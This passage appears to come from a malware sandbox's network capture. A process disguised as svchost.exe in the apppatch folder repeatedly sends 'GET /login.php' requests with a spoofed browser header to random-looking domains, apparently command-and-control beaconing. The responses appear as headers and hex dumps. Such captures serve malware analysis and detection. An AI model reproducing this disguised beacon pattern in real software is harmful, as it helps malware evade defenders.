                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:35:05.261358976 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:35:05.263849020 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gadyniw.com
Nov 11, 2024 18:35:05.626763105 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.8 | 57740 | 188.114.96.3 | 80 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:35:05.036922932 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
Nov 11, 2024 18:35:05.732727051 CET | 966 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:05 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: https://qegyhig.com/login.php
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qeuQ43CNxzwGRj9UTpjCRsosV%2B3kTZ5qaJkba7rXb9SfZAD7wp1XPTWZvot3m08bcv6nXPPH13xNMwXv6zPDQm1i4kRBaNurobydHijdX37g1TGiY7E%2B2UnmhzJBgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e10096ac9ca17bd-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1589&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49720 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:09 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:10 UTC | 952 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge6GOPmFxSV%2B%2BT1%2BTIQRK%2FQnxWhDhab5m1AReH97BZwIblOhjTwPxAQzqDYJi5Ikbxcxs638E8NKaGwhpmfZYd6iogWjk3EkTy5J3c4C7O9n1zIcGr9RLqJ5P%2F9thA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006993f408c7b-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1327&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=abb06ee54315933e&ts=1213&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49719 | 75.2.71.199 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:09 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:10 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:10 GMT
                                                                                                                                                                                                              Etag: "6vifn7jsa919wv"
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Server: awselb/2.0
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              X-Powered-By: Next.js
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                              Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                              Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                              Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                              Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                              2024-11-11 17:33:10 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                              Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49723 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:11 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:12 UTC | 949 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:12 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1ljoVH9newXjkKfzem65efiD7VUtVQw%2FbOPYzPLMdSt23kXzF%2FtbIgmKTCAc5%2Byf7BXJTWTusSUla5Suuip030zDj1RXhKv3Hve%2FWLL8GYkQN466CylAvuCXjqaMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006a3fc2372aa-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=1353271&cwnd=239&unsent_bytes=0&cid=92f444a8342b0a08&ts=746&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49729 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:14 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:15 UTC | 1085 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:15 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="46.0",amp_style_sanitizer;dur="22.9",amp_tag_and_attribute_sanitizer;dur="17.1",amp_optimizer;dur="18.5"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLq82wRQNVpIHvzacho9ZxSgg61RbCRLrnTeOQFqm3ggFGC6zAzXo5Z91YrbZjKk1%2F55pZj1u%2FKvqZse03KhvuTA2iIoxJCOfALMc75RcMNLtEmy8jq8TdZ0U5S03A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006b5795cafac-NRT
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=155429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18630&cwnd=32&unsent_bytes=0&cid=61270023507c636c&ts=1428&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49731 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:17 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lysyvan.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:19 UTC | 1094 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:18 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              server-timing: amp_sanitizer;dur="44.3",amp_style_sanitizer;dur="19.1",amp_tag_and_attribute_sanitizer;dur="21.1",amp_optimizer;dur="17.8"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMcpETkdI4nHjMXP%2FDrmQ5ifVjoPo%2F4xu2h4eC7%2B%2BAUvCToUV7HDPEkjlYWIsOmH%2FDbm%2BZDAVaxbrSlCoqfbVpUH7yR5xNh8fK5C4gMh4QOY39eAMnLSoWfelsnZeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1006c97f804328-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2505190&cwnd=251&unsent_bytes=0&cid=bb0cb41164c0613d&ts=1421&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 50112 | 75.2.71.199 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:35 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:35 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              Etag: "lswwo6qdvu19wv"
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Server: awselb/2.0
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              X-Powered-By: Next.js
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 50111 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:35 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:33:36 UTC | 951 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:33:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1p%2B3ek1m0cURCHenj1AiLsqvqVr%2Fh9sYjBQZbwcDOBqNdCTjR4bM1A0rYn%2B0OflXLyqGbNEBploXXZgeuX3zmF3k6AH%2FFyuMFRDMMnMHomnEhaiX%2FRUXpstnuAfuw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e100739b8c80cac-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=249&unsent_bytes=0&cid=90ed1645990d313e&ts=995&x=0"
                                                                                                                                                                                                              Data Ascii: nt .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .sel


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 50114 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:37 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-11 17:33:38 UTC | 949 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:37 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XVVDvfTPVq9kVwA2OMG%2BQ7Wh3RxUu2n%2Fnbe1UvtKCbBUx%2BycbYrOslijTCCN3neabQx%2Bgsdwp5E1pi3VO15D5iIq8u4l1PduUpkkRrbWxnG5ImqbjDfH3mpBVGAjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100744191c1921-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1293&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=15d0f1ed8208f477&ts=776&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 50115 | 188.114.96.3 | 443 | 7652 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:33:39 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
